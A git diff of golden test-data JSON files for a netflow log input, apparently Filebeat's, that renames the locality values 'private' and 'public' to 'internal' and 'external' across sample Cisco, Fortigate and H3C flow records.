@@ -1085,7 +1085,7 @@ "Fields": { "destination": { "ip": "10.12.106.83", - "locality": "private", + "locality": "internal", "port": 1720 }, "event": { @@ -1101,7 +1101,7 @@ }, "flow": { "id": "7iMintjCsaw", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAAQA==", @@ -1148,7 +1148,7 @@ "source": { "bytes": 80, "ip": "10.10.11.21", - "locality": "private", + "locality": "internal", "packets": 2, "port": 61440 } @@ -1162,7 +1162,7 @@ "Fields": { "destination": { "ip": "74.201.129.29", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -1178,7 +1178,7 @@ }, "flow": { "id": "hphBugBrKPY", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "DQABxQ==", @@ -1225,7 +1225,7 @@ "source": { "bytes": 3088, "ip": "10.12.81.86", - "locality": "private", + "locality": "internal", "packets": 10, "port": 58657 } @@ -1239,7 +1239,7 @@ "Fields": { "destination": { "ip": "10.12.100.13", - "locality": "private", + "locality": "internal", "port": 389 }, "event": { @@ -1255,7 +1255,7 @@ }, "flow": { "id": "gJ7Z20zGGk8", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAB2Q==", @@ -1302,7 +1302,7 @@ "source": { "bytes": 5306, "ip": "10.14.121.98", - "locality": "private", + "locality": "internal", "packets": 24, "port": 50174 } @@ -1316,7 +1316,7 @@ "Fields": { "destination": { "ip": "10.100.105.86", - "locality": "private", + "locality": "internal", "port": 58843 }, "event": { @@ -1332,7 +1332,7 @@ }, "flow": { "id": "Ddy-Ii-ZDDI", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAoQ==", @@ -1379,7 +1379,7 @@ "source": { "bytes": 116, "ip": "10.11.21.60", - "locality": "private", + "locality": "internal", "packets": 1, "port": 161 } @@ -1393,7 +1393,7 @@ "Fields": { "destination": { "ip": "10.14.121.98", - "locality": "private", + "locality": "internal", "port": 50174 }, "event": { 
@@ -1409,7 +1409,7 @@ }, "flow": { "id": "gJ7Z20zGGk8", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAB2Q==", @@ -1456,7 +1456,7 @@ "source": { "bytes": 22764, "ip": "10.12.100.13", - "locality": "private", + "locality": "internal", "packets": 30, "port": 389 } @@ -1470,7 +1470,7 @@ "Fields": { "destination": { "ip": "10.10.11.21", - "locality": "private", + "locality": "internal", "port": 61443 }, "event": { @@ -1486,7 +1486,7 @@ }, "flow": { "id": "LZaFrMI9jg0", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAAQA==", @@ -1533,7 +1533,7 @@ "source": { "bytes": 80, "ip": "10.12.102.125", - "locality": "private", + "locality": "internal", "packets": 2, "port": 1720 } @@ -1547,7 +1547,7 @@ "Fields": { "destination": { "ip": "10.11.21.60", - "locality": "private", + "locality": "internal", "port": 161 }, "event": { @@ -1563,7 +1563,7 @@ }, "flow": { "id": "f6pXcQQIzpU", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAoQ==", @@ -1610,7 +1610,7 @@ "source": { "bytes": 75, "ip": "10.100.105.86", - "locality": "private", + "locality": "internal", "packets": 1, "port": 58844 } @@ -1624,7 +1624,7 @@ "Fields": { "destination": { "ip": "10.12.102.125", - "locality": "private", + "locality": "internal", "port": 1720 }, "event": { @@ -1640,7 +1640,7 @@ }, "flow": { "id": "LZaFrMI9jg0", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAAQA==", @@ -1687,7 +1687,7 @@ "source": { "bytes": 80, "ip": "10.10.11.21", - "locality": "private", + "locality": "internal", "packets": 2, "port": 61443 } @@ -1701,7 +1701,7 @@ "Fields": { "destination": { "ip": "10.10.4.151", - "locality": "private", + "locality": "internal", "port": 161 }, "event": { @@ -1717,7 +1717,7 @@ }, "flow": { "id": "gQGJtHjUcB8", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAoQ==", 
@@ -1764,7 +1764,7 @@ "source": { "bytes": 160, "ip": "10.100.105.85", - "locality": "private", + "locality": "internal", "packets": 2, "port": 37265 } @@ -1778,7 +1778,7 @@ "Fields": { "destination": { "ip": "17.253.24.253", - "locality": "public", + "locality": "external", "port": 123 }, "event": { @@ -1794,7 +1794,7 @@ }, "flow": { "id": "UHiF_w4I6zM", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "AwAAew==", @@ -1841,7 +1841,7 @@ "source": { "bytes": 76, "ip": "10.14.25.80", - "locality": "private", + "locality": "internal", "packets": 1, "port": 62427 } @@ -1855,7 +1855,7 @@ "Fields": { "destination": { "ip": "10.100.101.43", - "locality": "private", + "locality": "internal", "port": 49156 }, "event": { @@ -1871,7 +1871,7 @@ }, "flow": { "id": "czsFrOKrayM", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAB2Q==", @@ -1918,7 +1918,7 @@ "source": { "bytes": 1340, "ip": "10.12.150.13", - "locality": "private", + "locality": "internal", "packets": 2, "port": 61792 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-NBAR-flowset-262.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-NBAR-flowset-262.golden.json index 48dc5ef1c839..b5724dfc3424 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-NBAR-flowset-262.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-NBAR-flowset-262.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.30.19.180", - "locality": "private", + "locality": "internal", "mac": "1c:df:0f:7e:c3:58", "port": 2048 }, @@ -27,7 +27,7 @@ }, "flow": { "id": "Bk-2FcuOyCU", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AQAAAQ==", @@ -84,7 +84,7 @@ "source": { "bytes": 44, "ip": "10.30.18.62", - "locality": "private", + "locality": "internal", "mac": "00:50:56:91:56:86", "packets": 1, "port": 0 
@@ -99,7 +99,7 @@ "Fields": { "destination": { "ip": "10.30.19.180", - "locality": "private", + "locality": "internal", "mac": "1c:df:0f:7e:c3:58", "port": 161 }, @@ -119,7 +119,7 @@ }, "flow": { "id": "4Xk8GtQfUAo", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "BQAAJg==", @@ -176,7 +176,7 @@ "source": { "bytes": 106, "ip": "10.30.18.62", - "locality": "private", + "locality": "internal", "mac": "00:50:56:91:56:86", "packets": 1, "port": 34220 @@ -191,7 +191,7 @@ "Fields": { "destination": { "ip": "10.30.19.180", - "locality": "private", + "locality": "internal", "mac": "1c:df:0f:7e:c3:58", "port": 2048 }, @@ -211,7 +211,7 @@ }, "flow": { "id": "tfLRXnB6AOA", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AQAAAQ==", @@ -268,7 +268,7 @@ "source": { "bytes": 44, "ip": "10.10.172.60", - "locality": "private", + "locality": "internal", "mac": "00:18:19:9e:6c:01", "packets": 1, "port": 0 @@ -283,7 +283,7 @@ "Fields": { "destination": { "ip": "10.30.19.180", - "locality": "private", + "locality": "internal", "mac": "1c:df:0f:7e:c3:58", "port": 123 }, @@ -303,7 +303,7 @@ }, "flow": { "id": "1mfP23NPuB8", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAew==", @@ -360,7 +360,7 @@ "source": { "bytes": 76, "ip": "10.10.172.60", - "locality": "private", + "locality": "internal", "mac": "00:18:19:9e:6c:01", "packets": 1, "port": 123 @@ -375,7 +375,7 @@ "Fields": { "destination": { "ip": "10.30.19.180", - "locality": "private", + "locality": "internal", "mac": "1c:df:0f:7e:c3:58", "port": 161 }, @@ -395,7 +395,7 @@ }, "flow": { "id": "g6a7KlISbtM", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "BQAAJg==", @@ -452,7 +452,7 @@ "source": { "bytes": 2794, "ip": "10.10.172.60", - "locality": "private", + "locality": "internal", "mac": "00:18:19:9e:6c:01", "packets": 36, "port": 45269 
diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-WLC.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-WLC.golden.json index b4f6a597dbe4..91b2caa73d28 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-WLC.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-WLC.golden.json @@ -21,7 +21,7 @@ }, "flow": { "id": "lTcFptYSabQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAB3w==", @@ -56,7 +56,7 @@ "source": { "bytes": 3320, "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51", "packets": 83 } @@ -70,7 +70,7 @@ "Fields": { "destination": { "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51" }, "event": { @@ -86,7 +86,7 @@ }, "flow": { "id": "Q1JIGzkHw0I", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAB3w==", @@ -147,7 +147,7 @@ }, "flow": { "id": "lTcFptYSabQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAANQ==", @@ -182,7 +182,7 @@ "source": { "bytes": 7760, "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51", "packets": 69 } @@ -196,7 +196,7 @@ "Fields": { "destination": { "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51" }, "event": { @@ -212,7 +212,7 @@ }, "flow": { "id": "Q1JIGzkHw0I", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAANQ==", @@ -273,7 +273,7 @@ }, "flow": { "id": "lTcFptYSabQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAig==", @@ -308,7 +308,7 @@ "source": { "bytes": 215, "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51", "packets": 1 } 
@@ -336,7 +336,7 @@ }, "flow": { "id": "lTcFptYSabQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAAAQ==", @@ -371,7 +371,7 @@ "source": { "bytes": 40854, "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51", "packets": 225 } @@ -385,7 +385,7 @@ "Fields": { "destination": { "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51" }, "event": { @@ -401,7 +401,7 @@ }, "flow": { "id": "Q1JIGzkHw0I", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAAAQ==", @@ -462,7 +462,7 @@ }, "flow": { "id": "lTcFptYSabQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAUA==", @@ -497,7 +497,7 @@ "source": { "bytes": 12279, "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51", "packets": 63 } @@ -511,7 +511,7 @@ "Fields": { "destination": { "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51" }, "event": { @@ -527,7 +527,7 @@ }, "flow": { "id": "Q1JIGzkHw0I", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAUA==", @@ -588,7 +588,7 @@ }, "flow": { "id": "lTcFptYSabQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -623,7 +623,7 @@ "source": { "bytes": 147145, "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51", "packets": 773 } @@ -637,7 +637,7 @@ "Fields": { "destination": { "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51" }, "event": { @@ -653,7 +653,7 @@ }, "flow": { "id": "Q1JIGzkHw0I", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", 
@@ -714,7 +714,7 @@ }, "flow": { "id": "lTcFptYSabQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQACCA==", @@ -749,7 +749,7 @@ "source": { "bytes": 6777, "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51", "packets": 26 } @@ -763,7 +763,7 @@ "Fields": { "destination": { "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51" }, "event": { @@ -779,7 +779,7 @@ }, "flow": { "id": "Q1JIGzkHw0I", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQACCA==", @@ -840,7 +840,7 @@ }, "flow": { "id": "lTcFptYSabQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwABuw==", @@ -875,7 +875,7 @@ "source": { "bytes": 2433001, "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51", "packets": 20434 } @@ -889,7 +889,7 @@ "Fields": { "destination": { "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51" }, "event": { @@ -905,7 +905,7 @@ }, "flow": { "id": "Q1JIGzkHw0I", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwABuw==", @@ -966,7 +966,7 @@ }, "flow": { "id": "lTcFptYSabQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AQAAAQ==", @@ -1001,7 +1001,7 @@ "source": { "bytes": 1658, "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51", "packets": 15 } @@ -1015,7 +1015,7 @@ "Fields": { "destination": { "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51" }, "event": { @@ -1031,7 +1031,7 @@ }, "flow": { "id": "Q1JIGzkHw0I", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AQAAAQ==", 
@@ -1092,7 +1092,7 @@ }, "flow": { "id": "lTcFptYSabQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABrw==", @@ -1127,7 +1127,7 @@ "source": { "bytes": 1495567, "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51", "packets": 16145 } @@ -1141,7 +1141,7 @@ "Fields": { "destination": { "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51" }, "event": { @@ -1157,7 +1157,7 @@ }, "flow": { "id": "Q1JIGzkHw0I", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABrw==", diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Fortigate-FortiOS-5.2.1.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Fortigate-FortiOS-5.2.1.golden.json index 1ae09a26b586..8dc5747704ac 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Fortigate-FortiOS-5.2.1.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Fortigate-FortiOS-5.2.1.golden.json @@ -48,7 +48,7 @@ "Fields": { "destination": { "ip": "31.13.87.36", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -64,7 +64,7 @@ }, "flow": { "id": "SKsZNpZob60", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "31.13.87.36", @@ -109,7 +109,7 @@ "source": { "bytes": 152, "ip": "192.168.99.7", - "locality": "private", + "locality": "internal", "packets": 3, "port": 61910 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Fortigate-FortiOS-54x-appid.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Fortigate-FortiOS-54x-appid.golden.json index bb8678bcad1d..dd90fa13b6d8 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Fortigate-FortiOS-54x-appid.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Fortigate-FortiOS-54x-appid.golden.json 
@@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "182.50.136.239", - "locality": "public", + "locality": "external", "port": 80 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "FfT-8jRRvok", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "FAAAMEQAAI80", @@ -78,7 +78,7 @@ "source": { "bytes": 748, "ip": "192.168.100.151", - "locality": "private", + "locality": "internal", "packets": 6, "port": 45380 } @@ -92,7 +92,7 @@ "Fields": { "destination": { "ip": "192.168.100.151", - "locality": "private", + "locality": "internal", "port": 44778 }, "event": { @@ -111,7 +111,7 @@ }, "flow": { "id": "bZjTG4EkhLs", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "FAAAMEQAAJ54", @@ -163,7 +163,7 @@ "source": { "bytes": 6948, "ip": "208.100.17.187", - "locality": "public", + "locality": "external", "packets": 10, "port": 443 } @@ -177,7 +177,7 @@ "Fields": { "destination": { "ip": "208.100.17.187", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -196,7 +196,7 @@ }, "flow": { "id": "bZjTG4EkhLs", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "FAAAMEQAAJ54", @@ -248,7 +248,7 @@ "source": { "bytes": 1584, "ip": "192.168.100.151", - "locality": "private", + "locality": "internal", "packets": 14, "port": 44778 } @@ -262,7 +262,7 @@ "Fields": { "destination": { "ip": "192.168.100.151", - "locality": "private", + "locality": "internal", "port": 50618 }, "event": { @@ -281,7 +281,7 @@ }, "flow": { "id": "kZjCeMUhjqE", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "FAAAMEQAAJ54", @@ -333,7 +333,7 @@ "source": { "bytes": 8201, "ip": "208.100.17.189", - "locality": "public", + "locality": "external", "packets": 11, "port": 443 } @@ -347,7 +347,7 @@ "Fields": { "destination": { "ip": "208.100.17.189", - "locality": "public", + "locality": "external", "port": 443 }, "event": { 
@@ -366,7 +366,7 @@ }, "flow": { "id": "kZjCeMUhjqE", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "FAAAMEQAAJ54", @@ -418,7 +418,7 @@ "source": { "bytes": 1729, "ip": "192.168.100.151", - "locality": "private", + "locality": "internal", "packets": 15, "port": 50618 } @@ -432,7 +432,7 @@ "Fields": { "destination": { "ip": "192.168.100.151", - "locality": "private", + "locality": "internal", "port": 33660 }, "event": { @@ -451,7 +451,7 @@ }, "flow": { "id": "8PR91KFjFKw", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "FAAAMEQAAGTz", @@ -503,7 +503,7 @@ "source": { "bytes": 1122, "ip": "178.255.83.1", - "locality": "public", + "locality": "external", "packets": 5, "port": 80 } @@ -517,7 +517,7 @@ "Fields": { "destination": { "ip": "178.255.83.1", - "locality": "public", + "locality": "external", "port": 80 }, "event": { @@ -536,7 +536,7 @@ }, "flow": { "id": "8PR91KFjFKw", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "FAAAMEQAAGTz", @@ -588,7 +588,7 @@ "source": { "bytes": 705, "ip": "192.168.100.151", - "locality": "private", + "locality": "internal", "packets": 5, "port": 33660 } @@ -602,7 +602,7 @@ "Fields": { "destination": { "ip": "192.168.100.151", - "locality": "private", + "locality": "internal", "port": 33646 }, "event": { @@ -621,7 +621,7 @@ }, "flow": { "id": "O5vacJG8mLQ", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "FAAAMEQAAGTz", @@ -673,7 +673,7 @@ "source": { "bytes": 1123, "ip": "178.255.83.1", - "locality": "public", + "locality": "external", "packets": 5, "port": 80 } @@ -687,7 +687,7 @@ "Fields": { "destination": { "ip": "178.255.83.1", - "locality": "public", + "locality": "external", "port": 80 }, "event": { @@ -706,7 +706,7 @@ }, "flow": { "id": "O5vacJG8mLQ", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "FAAAMEQAAGTz", 
@@ -758,7 +758,7 @@ "source": { "bytes": 706, "ip": "192.168.100.151", - "locality": "private", + "locality": "internal", "packets": 5, "port": 33646 } @@ -772,7 +772,7 @@ "Fields": { "destination": { "ip": "192.168.100.150", - "locality": "private", + "locality": "internal", "port": 52970 }, "event": { @@ -791,7 +791,7 @@ }, "flow": { "id": "wdz94oax40U", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "FAAAMEQAAAAA", @@ -839,7 +839,7 @@ "source": { "bytes": 74, "ip": "192.168.100.111", - "locality": "private", + "locality": "internal", "packets": 1, "port": 53 } @@ -853,7 +853,7 @@ "Fields": { "destination": { "ip": "192.168.100.111", - "locality": "private", + "locality": "internal", "port": 53 }, "event": { @@ -872,7 +872,7 @@ }, "flow": { "id": "wdz94oax40U", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "FAAAMEQAAAAA", @@ -920,7 +920,7 @@ "source": { "bytes": 58, "ip": "192.168.100.150", - "locality": "private", + "locality": "internal", "packets": 1, "port": 52970 } @@ -934,7 +934,7 @@ "Fields": { "destination": { "ip": "192.168.100.150", - "locality": "private", + "locality": "internal", "port": 49311 }, "event": { @@ -953,7 +953,7 @@ }, "flow": { "id": "KvZZ7LW-Qdc", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "FAAAMEQAAAAA", @@ -1001,7 +1001,7 @@ "source": { "bytes": 74, "ip": "192.168.100.111", - "locality": "private", + "locality": "internal", "packets": 1, "port": 53 } @@ -1015,7 +1015,7 @@ "Fields": { "destination": { "ip": "192.168.100.111", - "locality": "private", + "locality": "internal", "port": 53 }, "event": { @@ -1034,7 +1034,7 @@ }, "flow": { "id": "KvZZ7LW-Qdc", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "FAAAMEQAAAAA", @@ -1082,7 +1082,7 @@ "source": { "bytes": 58, "ip": "192.168.100.150", - "locality": "private", + "locality": "internal", "packets": 1, "port": 49311 } 
@@ -1096,7 +1096,7 @@ "Fields": { "destination": { "ip": "192.168.100.150", - "locality": "private", + "locality": "internal", "port": 51746 }, "event": { @@ -1115,7 +1115,7 @@ }, "flow": { "id": "PC3a5T13Dpw", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "FAAAMEQAAAAA", @@ -1163,7 +1163,7 @@ "source": { "bytes": 1071, "ip": "192.168.100.111", - "locality": "private", + "locality": "internal", "packets": 5, "port": 80 } @@ -1177,7 +1177,7 @@ "Fields": { "destination": { "ip": "192.168.100.111", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1196,7 +1196,7 @@ }, "flow": { "id": "PC3a5T13Dpw", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "FAAAMEQAAAAA", @@ -1244,7 +1244,7 @@ "source": { "bytes": 1147, "ip": "192.168.100.150", - "locality": "private", + "locality": "internal", "packets": 6, "port": 51746 } @@ -1258,7 +1258,7 @@ "Fields": { "destination": { "ip": "192.168.100.150", - "locality": "private", + "locality": "internal", "port": 51745 }, "event": { @@ -1277,7 +1277,7 @@ }, "flow": { "id": "zdGWMwGlfsg", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "FAAAMEQAAAAA", @@ -1325,7 +1325,7 @@ "source": { "bytes": 1980, "ip": "192.168.100.111", - "locality": "private", + "locality": "internal", "packets": 6, "port": 80 } @@ -1339,7 +1339,7 @@ "Fields": { "destination": { "ip": "192.168.100.111", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1358,7 +1358,7 @@ }, "flow": { "id": "zdGWMwGlfsg", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "FAAAMEQAAAAA", @@ -1406,7 +1406,7 @@ "source": { "bytes": 2164, "ip": "192.168.100.150", - "locality": "private", + "locality": "internal", "packets": 8, "port": 51745 } 
diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-H3C-Netstream-with-varstring.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-H3C-Netstream-with-varstring.golden.json index a63ef85e3c41..6a2049213916 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-H3C-Netstream-with-varstring.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-H3C-Netstream-with-varstring.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "20.20.255.255", - "locality": "public", + "locality": "external", "port": 137 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "dK1E5m-O-ns", - "locality": "public" + "locality": "external" }, "netflow": { "bgp_destination_as_number": 0, @@ -84,7 +84,7 @@ "source": { "bytes": 702, "ip": "20.20.20.20", - "locality": "public", + "locality": "external", "packets": 9, "port": 137 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-H3C.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-H3C.golden.json index 9ee961bb97fb..a69dbeea3865 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-H3C.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-H3C.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.22.163.21", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "6gDDasxO-4o", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -83,7 +83,7 @@ "source": { "bytes": 1027087, "ip": "10.22.166.30", - "locality": "private", + "locality": "internal", "packets": 697, "port": 0 } @@ -97,7 +97,7 @@ "Fields": { "destination": { "ip": "10.21.3.172", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -116,7 +116,7 @@ }, "flow": { "id": "RJbWY0zxttI", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, 
@@ -173,7 +173,7 @@ "source": { "bytes": 6200, "ip": "10.22.166.12", - "locality": "private", + "locality": "internal", "packets": 6, "port": 0 } @@ -187,7 +187,7 @@ "Fields": { "destination": { "ip": "10.22.178.37", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -206,7 +206,7 @@ }, "flow": { "id": "MfdYhUDA3Y4", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -263,7 +263,7 @@ "source": { "bytes": 11896, "ip": "10.22.166.33", - "locality": "private", + "locality": "internal", "packets": 21, "port": 0 } @@ -277,7 +277,7 @@ "Fields": { "destination": { "ip": "10.20.100.253", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -296,7 +296,7 @@ }, "flow": { "id": "_QFogYw9xiY", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -353,7 +353,7 @@ "source": { "bytes": 1041, "ip": "10.22.166.35", - "locality": "private", + "locality": "internal", "packets": 3, "port": 0 } @@ -367,7 +367,7 @@ "Fields": { "destination": { "ip": "10.20.136.36", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -386,7 +386,7 @@ }, "flow": { "id": "-O7eEnuq5LI", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -443,7 +443,7 @@ "source": { "bytes": 1740, "ip": "10.22.166.36", - "locality": "private", + "locality": "internal", "packets": 20, "port": 0 } @@ -457,7 +457,7 @@ "Fields": { "destination": { "ip": "10.20.147.28", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -476,7 +476,7 @@ }, "flow": { "id": "pcgnaJ3iCvI", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -533,7 +533,7 @@ "source": { "bytes": 2998, "ip": "10.22.166.36", - "locality": "private", + "locality": "internal", "packets": 16, "port": 0 } 
@@ -547,7 +547,7 @@ "Fields": { "destination": { "ip": "10.20.141.16", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -566,7 +566,7 @@ }, "flow": { "id": "_gbuwRW4AVE", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -623,7 +623,7 @@ "source": { "bytes": 55773, "ip": "10.22.166.28", - "locality": "private", + "locality": "internal", "packets": 37, "port": 0 } @@ -637,7 +637,7 @@ "Fields": { "destination": { "ip": "10.20.162.17", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -656,7 +656,7 @@ }, "flow": { "id": "VOe0rUor-cg", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -713,7 +713,7 @@ "source": { "bytes": 3239438, "ip": "10.22.166.35", - "locality": "private", + "locality": "internal", "packets": 2135, "port": 0 } @@ -727,7 +727,7 @@ "Fields": { "destination": { "ip": "10.20.171.36", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -746,7 +746,7 @@ }, "flow": { "id": "nkp7tr2MVcs", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -803,7 +803,7 @@ "source": { "bytes": 5701, "ip": "10.22.166.15", - "locality": "private", + "locality": "internal", "packets": 20, "port": 0 } @@ -817,7 +817,7 @@ "Fields": { "destination": { "ip": "10.22.208.12", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -836,7 +836,7 @@ }, "flow": { "id": "WxCFEmsTIh0", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -893,7 +893,7 @@ "source": { "bytes": 4255012, "ip": "10.22.166.2", - "locality": "private", + "locality": "internal", "packets": 2804, "port": 0 } @@ -907,7 +907,7 @@ "Fields": { "destination": { "ip": "10.22.196.21", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { 
